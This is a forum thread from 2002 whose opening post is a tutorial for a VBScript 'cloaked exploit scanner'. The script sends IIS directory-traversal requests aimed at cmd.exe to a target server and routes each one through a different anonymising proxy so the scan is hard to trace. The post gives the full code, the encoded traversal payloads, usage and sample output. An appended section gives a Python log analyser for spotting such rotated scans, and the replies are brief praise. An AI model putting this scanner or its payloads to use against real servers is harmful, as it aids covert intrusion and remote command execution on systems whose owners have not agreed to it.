Cloaked Exploit Scanner II

  1. #1
    Senior Member
    Join Date
    Apr 2002
    Posts
    324

    Cloaked Exploit Scanner II

    Overview

    This is a continuation of my article on writing a Cloaked exploit scanner. In the first part we created a file called 'livehosts' containing a list of responding anonymising proxy servers. In this article we will look at how to rotate through this file, connecting to a target server via a different proxy server for every request we make.

    If you have not already read parts I - IV of this set of articles on the tcpUtil code please refer to these threads first before attempting the following:
    Part I of this document
    Scripting Internet Connections Under Window$
    Search Engine submission 'exploit'
    Google 'exploit' - TCPUtil pt III


    The Exploit File

    Requests that are to be passed through the proxy to a server are listed in the 'exploit' file. A sample exploit file is included in the zip file at the end of this article, but you could stuff this file with just about anything. The file contains request URLs that the script will try and GET on the target machine via a proxy.

    For example, the format of a simple traversal exploit would be as follows.

    /.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\

    The script will try each request line in turn, cycling through the list of proxies in the live hosts file.

    Usage

    Usage: scan.vbs [--Target|-t] Ip address or hostname of target
            [--exploitfile|-e] file name to read exploit list from
            [--proxyfile|-p] file name to read live proxies list from
            [--Delay|-d] Page Time Out delay (in seconds) Default: 1 Seconds
            [--Verbose|-v]
            [--debug|-vv]
            [--Help|-?]

    An example:

    scan -t www.ntsa.org.uk -e exploit -p livehosts -d 1

    The command above scans www.ntsa.org.uk using the file exploit as the list of requests and livehosts as the list of live anonymising proxy servers. The command produces the output below. Notice that each request is made via a different proxy server. The Server response is the return code from the server. If the return code is 200 (successful) then you have (in the examples) found a traversal to the command line.

    --Cloaked Exploit Scanner.
    --July 2002 by NTSA.
    --www.ntsa.org.uk

    exploit: HEAD http://www.ntsa.org.uk/.%2e/.%2e/win...exe?/c+dir+c:\
    HTTP/1.0
    Proxy: 207.2.54.2
    Port: 80
    Server Response> 403
    exploit: HEAD http://www.ntsa.org.uk/..%2e..%2ewin...exe?/c+dir+c:\
    HTTP/1.0
    Proxy: 12.34.48.126
    Port: 80
    Server Response> 404
    exploit: HEAD http://www.ntsa.org.uk/..%2f..%2f..%...tem32/cmd.exe?
    /c+dir+c:\ HTTP/1.0
    Proxy: 12.34.48.129
    Port: 80
    Server Response> 403
    exploit: HEAD http://www.ntsa.org.uk/..%2f..%2fwin...exe?/c+dir+c:\
    HTTP/1.0
    Proxy: 66.64.3.154
    Port: 80
    Server Response> 403
    exploit: HEAD http://www.ntsa.org.uk/..%5c..%5c..%...innt/system32/
    cmd.exe?/c+dir+c:\ HTTP/1.0
    Proxy: 208.144.37.7
    Port: 80
    Server Response> 403
    exploit: HEAD http://www.ntsa.org.uk/..%5c..%5cwin...exe?/c+dir+c:\
    HTTP/1.0
    Proxy: 207.35.39.100
    Port: 80
    Server Response> 403
    exploit: HEAD http://www.ntsa.org.uk/..%5c../..%5c.../system32/cmd.
    exe?/c+dir+c:\ HTTP/1.0
    Proxy: 204.60.171.225
    Port: 80
    Server Response> 403

    Registration of the sbwinsock control

    You need to register the sbwinsock.ocx control provided in the zip file at the end of this post. To register the OCX component run the following command:

    regsvr32 <path_to_OCX>\<component_name>.OCX

    The Code!

    Code:
    dim buffer,blncon,blnSkip,wtresp,secwait,blnLastcmdnull 'Program Vars
    DIM blnbuff,blnifile,lang,sdelay,Verbose,debug,iFile,Ofile,str,Target,exploitfile,proxyfile 'User Vars
    Dim oArgs, ArgNum 'Argument vars
    
    Const sckTCPProtocol=0 
    Const sckUDPProtocol=1
    
    const FlgDebug =1
    const flgVerbose =2
    const flgEcho =3
    
    Const ForReading = 1
    const ForWriting = 2
    
    WScript.Echo "--Cloaked Traversal Scanner."
    WScript.Echo "--July 2002 by NTSA."
    WScript.Echo "--www.ntsa.org.uk"
    WScript.Echo ""
    
    'Create a FSO for file I/O operations
    Set fso = CreateObject("Scripting.FileSystemObject")
    'Create the winsock object and pass the event handler prefix wsPop_
    on error resume next
    Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
    if err.number > 0 then 
    out "Could not create an instance of the SBWinsck control.",flgEcho
    out "You need to register SBWinsck.ocx using the regsvr32",flgEcho
    out "command. (ie regsvr32 c:\path\sbWinsck.ocx where c:\path",flgEcho
    out "is the full path to the ocx file.",flgEcho
    'Nothing below can work without the control, so stop here
    wscript.quit(1)
    end if
    
    
    GetUserParams
    
    sp = split (proxylist,"|")
    proxycount = cint(sp(0))
    proxy = split(sp(1),",")
    
    ex = split (ExploitList,"|")
    Exploitcount = cint(ex(0))
    Exploit = split(ex(1),",")
    
    px = 0
    
    for n = 0 to Exploitcount -1
    
    sp = split(proxy(px),":")
    host = sp(0)
    port = sp(1)
    
    str = "HEAD " & lcase("http://" & target & exploit(n)) & " HTTP/1.0"
    
    out "exploit: " & STR,flgecho
    out "Proxy: " & host,flgecho
    out "Port: " & port,flgecho
    
    tcpClient.Protocol = sckTCPProtocol
    tcpClient.RemoteHost = host 
    tcpClient.RemotePort =  port
    
    tcpClient.Connect
    
    tio = 0
    do until blncon = true or blnskip = true or tio = sdelay *2
    WSCRIPT.SLEEP 250
    out "Waiting for connection...",FlgDebug
    tio = tio + 1
    LOOP
    
    fail = false
    'Timed out - Could not connect
    if tio = sdelay *2 and blnskip =false then 
    out "Could not connect to: " & tcpClient.RemoteHost &_
    " on port: " & tcpClient.RemotePort & ".",FlgEcho
    fail = true
    end if
    
    if fail = false then
    
    tio = 0
    do until blncon = false or tio = sdelay *2
    	WSCRIPT.SLEEP 500
    	out "Waiting for disconnection...",FlgDebug
    	tio = tio + 1
    loop
    
    'Output buffer to screen
    out "Server Response> " & mid(buffer,10,3), Flgecho
    	
    end if
    
    blncon = false
    blnskip = false
    buffer = ""
    
    tcpclient.disconnect
    
    px = px + 1
    if px > proxycount -1 then px = 0	
    
    Set tcpClient=nothing
    Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
    next 
    
    function ProxyList 
    'Read the live proxy file: one host:port per line, optionally ended by a
    'line holding a single "." - returns "<count>|host:port,host:port,..."
    'A local line variable is used so the loop does not depend on the global
    '"host", and AtEndOfStream stops the loop if the "." terminator is missing.
    dim cnt, ln, lst, livehosts
    cnt = 0
    lst = ""
    
    Set livehosts = fso.OpenTextFile(proxyfile, ForReading)
    do until livehosts.AtEndOfStream
    ln = trim(livehosts.ReadLine)
    if ln = "." then exit do
    if len(ln) > 0 then
    	lst = lst & ln & ","
    	cnt = cnt + 1
    end if
    loop
    livehosts.Close
    
    'Drop the trailing comma
    if cnt > 0 then lst = left(lst,len(lst)-1)
    ProxyList = cstr(cnt) & "|" & lst
    
    end function
    
    function ExploitList 
    'Read the exploit file in the same layout as the proxy file:
    'returns "<count>|request,request,..."
    dim cnt, ln, lst, file
    cnt = 0
    lst = ""
    
    Set file = fso.OpenTextFile(exploitfile, ForReading)
    do until file.AtEndOfStream
    ln = trim(file.ReadLine)
    if ln = "." then exit do
    if len(ln) > 0 then
    	lst = lst & ln & ","
    	cnt = cnt + 1
    end if
    loop
    file.Close
    
    if cnt > 0 then lst = left(lst,len(lst)-1)
    ExploitList = cstr(cnt) & "|" & lst
    
    end function
    
    
    Sub wsPop_DataArrival(Byval b)
    
    dim strdata
    out "Data Arrival...",flgverbose	
    '/* Get the data and add it to the buffer...
    '*/
    tcpClient.GetData strData,vbstring
    
    if blnbuff = true then
    buffer = buffer &  strdata
    else
    out strdata,Flgverbose
    end if
    
    'Data has just arrived - wait some 
    'more to see if anything further comes
    secwait = 100
    blnskip = true
    
    end sub
    
    Sub wsPop_Connected()
    
    blncon = true
    blnskip = true
    out "Connected...",flgverbose
    'sending data to the host
    out "Sending data...",flgverbose
    
    sendandlog str & vbcrlf
    
    out "Data sent.",flgverbose
    
    End Sub
    
    sub sendandlog(data)
    
    tcpclient.SendData data & vbCrLf
    LogDataSend(data)
    
    end sub
    
    
    sub LogDataSend(poststr)
    
    'port is read from the proxy list as a string, so compare it numerically
    if cint(port) = 80 then
    out "Sending:> " & poststr,Flgverbose
    else 
    'out "Sending:> " & poststr,FlgEcho
    end if
    
    end sub
    
    Sub wsPop_Close()
    
    blncon = false
    out "Disconnected...",flgverbose
    
    End Sub
    
    function RemoveDel(str)
    
    RemoveDel = replace(str,"/","")
    RemoveDel = replace(RemoveDel,"-","")
    RemoveDel = replace(RemoveDel,"--","")
    
    end function
    
    function IsEmpty(str)
    
    if str & "" = "" then 
    isempty = true
    else
    isempty = false
    end if
    
    end function
    
    function iCount(str,del)
    
    icount =0
    
    for i = 1 to len(str)
    if mid(str,i,1) = del then
    	icount = icount +1
    end if
    next
    
    icount = icount - 1
    
    end function
    
    function input(quest)
    
    WScript.StdOut.Write(quest & ":>")
    input = WScript.StdIn.ReadLine()
    
    end function
    
    sub out(str,flg)
    
    select case flg
    case flgEcho
    	wscript.echo str
    case flgVerbose
    	if verbose = true or debug = true then
    		wscript.echo str
    	end if
    case FlgDebug
    	if debug = true then
    		wscript.echo str
    	end if
    end select
    end sub
    
    sub GetUserParams
    
    buffset = 0
    
    Set oArgs = WScript.Arguments
    ArgNum = 0
    While ArgNum < oArgs.Count
    
    Select Case RemoveDel(LCase(oArgs(ArgNum)))
    	Case "exploitfile","e":
    		ArgNum = ArgNum + 1
    		If (fso.FileExists(oArgs(ArgNum))) Then
    			exploitfile = oArgs(ArgNum)
    		else
    			out "Error! The file " & oArgs(ArgNum) & _
    			" was not found.",FlgEcho
    			out "",FlgEcho
    			displayusage
    			wscript.quit(1)
    		end if
    	Case "proxyfile","p":
    		ArgNum = ArgNum + 1
    		If (fso.FileExists(oArgs(ArgNum))) Then
    			proxyfile = oArgs(ArgNum)
    		else
    			out "Error! The file " & oArgs(ArgNum) & _
    			" was not found.",FlgEcho
    			out "",FlgEcho
    			displayusage
    			wscript.quit(1)
    		end if
    	Case "target","t":
    		ArgNum = ArgNum + 1
    		Target = oArgs(ArgNum)
    	Case "delay","d":
    		ArgNum = ArgNum + 1
    		sdelay = oArgs(ArgNum)
    	Case "help","?":
    		Call DisplayUsage
    	Case "verbose", "v":
    		Verbose = true
    	Case "debug","vv":
    		debug = true
    	Case Else:
    		WScript.Echo "Unknown argument "& oArgs(ArgNum)
    		Call DisplayUsage
    		wscript.quit(1)
    End Select	
    
    ArgNum = ArgNum + 1
    Wend
    
    blnbuff = true
    buffset = 1
    
    if isempty(sdelay) then
    'Set default as 1 second delay before breaking connection
    sdelay = 1
    end if
    
    if isempty(target) or isempty(exploitfile) or isempty(proxyfile) then
    'All three are mandatory - show the usage and stop
    out "A target host, a proxy file and exploit file are required.",flgecho
    DisplayUsage
    wscript.quit(1)
    else
    out "target> " & target,flgdebug
    out "exploitfile> " & exploitfile,flgdebug
    out "proxyfile> " & proxyfile,flgdebug
    end if
    
    end sub
    
    Sub DisplayUsage
    
    WScript.Echo "Usage: scan.vbs [--Target|-t]"
    WScript.Echo "        [--exploitfile|-e] file name to read exploit list from"
    WScript.Echo "        [--proxyfile|-p] file name to read live proxies list from"
    WScript.Echo "        [--Delay|-d] Page Time Out delay " & _ 
    		   "(in seconds) Default: 1 Seconds"
    WScript.Echo "        [--Verbose|-v]"
    WScript.Echo "        [--debug|-vv]"
    WScript.Echo "        [--Help|-?]"
    WScript.Echo ""
    WScript.Quit (1)	
    
    End Sub

    If you enjoyed this thread you may enjoy these others:

    Cloaked Exploit Scanner Part I and Part II
    Google 'exploit' - TCPUtil pt III
    Open Source FTP Control
    Web based classes
    Backing up the IIS metabase.
    What port is that?
    Building your own IDS tripwire.
    Credit card security
    Dumping SQL data to a text file
    Hunting down skript kiddies
    Search Engine submission 'exploit'
    Forced shutdown of a remote nt/2k server
    Securing an installation of IIS 4. (No, seriously)
    Remote DSN Connections, using WinAPIs and the registry
    Scripting Internet Connections Under Window$
    "I may not agree with what you say, but I will defend to the death your right to say it."
    Sir Winston Churchill.
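    Added here as a defender-side example, not part of the original post or of the NTSA script: the script above rotates the source address of every request, so the thing that stands out in the target's web log is not one noisy client but the same traversal request against cmd.exe arriving from several unrelated addresses within seconds, in several different encodings. The Python below parses a constructed, reduced W3C-style IIS log (field layout, sample records and the function names parse_line, normalize_path, is_traversal and analyze are all my assumptions), normalises each path (repeated percent-decoding, backslash folding), flags traversal requests, raises a finding for any such request that was answered with 200, and raises a second finding when three or more distinct client IPs send an equivalent request inside a 60 second window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample log (not from the original post). One record per request
# in a reduced W3C-style layout an IIS server could be configured to write:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2002-07-14 10:00:01 207.2.54.2 HEAD /.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\\ 403
2002-07-14 10:00:03 12.34.48.126 HEAD /..%2e..%2ewinnt/system32/cmd.exe /c+dir+c:\\ 404
2002-07-14 10:00:05 12.34.48.129 HEAD /..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\\ 403
2002-07-14 10:00:07 66.64.3.154 HEAD /..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\\ 403
2002-07-14 10:00:09 208.144.37.7 HEAD /..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-07-14 10:02:30 10.0.0.5 GET /index.html - 200
2002-07-14 10:02:31 10.0.0.5 GET /images/logo.gif - 200
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
CMD_RE = re.compile(r"(winnt|windows)/system32/cmd\.exe$")


def parse_line(line):
    """Return a dict for one log record, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["time"] = datetime.strptime(d["date"] + " " + d["time"], "%Y-%m-%d %H:%M:%S")
    d["status"] = int(d["status"])
    return d


def normalize_path(stem, max_rounds=3):
    """Percent-decode until the string stops changing (so %252e is seen as '.'),
    fold backslashes to forward slashes and lower-case the result."""
    cur = stem
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur.replace("\\", "/").lower()


def is_traversal(norm_path):
    """True for a '..' path segment or a decoded path ending in system32/cmd.exe."""
    return bool(TRAVERSAL_RE.search(norm_path) or CMD_RE.search(norm_path))


def analyze(log_text, window=timedelta(seconds=60), min_sources=3):
    """Return findings: every traversal request answered with 200, plus one
    'rotated_sources' finding per target when at least min_sources distinct
    client IPs sent an equivalent traversal request inside `window`."""
    findings = []
    by_target = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        norm = normalize_path(rec["stem"])
        if not is_traversal(norm):
            continue
        if rec["status"] == 200:
            findings.append({"kind": "traversal_success", "ip": rec["ip"],
                             "stem": rec["stem"], "time": rec["time"]})
        # Correlate on what is being reached for, not on the encoding used.
        target = (norm.rsplit("/", 1)[-1], rec["query"])
        by_target[target].append(rec)

    for target, recs in by_target.items():
        recs.sort(key=lambda r: r["time"])
        best = set()
        for i, first in enumerate(recs):
            seen = {r["ip"] for r in recs[i:] if r["time"] - first["time"] <= window}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_sources:
            findings.append({"kind": "rotated_sources", "target": target[0],
                             "sources": sorted(best), "count": len(best)})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

    Grouping on the decoded file name rather than the raw URL is the point of the check: per-IP rate limits never fire against a proxy-rotated scan, but the target and query string are identical across every rotation, and a 200 to any of them is the case the scan author is looking for and the one to treat as a confirmed traversal on the server side.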

  2. #2
    Senior Member
    Join Date
    Jun 2002
    Posts
    394
    aRRRRRRRRRRRRGh, another tut!
    that's too many, too soon and containing too much for me, i narrowly averted a buffer overflow when i saw this in the forum.
    is this stuff just bursting out of your head or what? can you not do something else to relieve the pressure? like knitting, it's supposed to be relaxing. or at least just pretend to not know something and write a bad tut. remember, some people out here like to think they have a good understanding of the machine!...thanks for making sure that more people actually do understand...me included, naturally.

    .maX
    Hmm...there's something a little peculiar here. Oh i see what it is! the sentence is talking about itself! do you see that? what do you mean? sentences can't talk! No, but they REFER to things, and this one refers directly-unambiguously-unmistakably-to the very sentence which it is!

  3. #3
    Senior Member
    Join Date
    Apr 2002
    Posts
    324
    rofl.

    Knitting sounds fun - but I doubt I'd be allowed any sharp objects.
    "I may not agree with what you say, but I will defend to the death your right to say it."
    Sir Winston Churchill.

  4. #4
    Senior Member
    Join Date
    Aug 2001
    Posts
    259
    man that is some poor internal documentation of code if I ever saw it, other than that good job.
    Alternate realities celebrate reality. If you can't handle the reality you're in, then you won't be able to handle the one you're attempting to escape to.
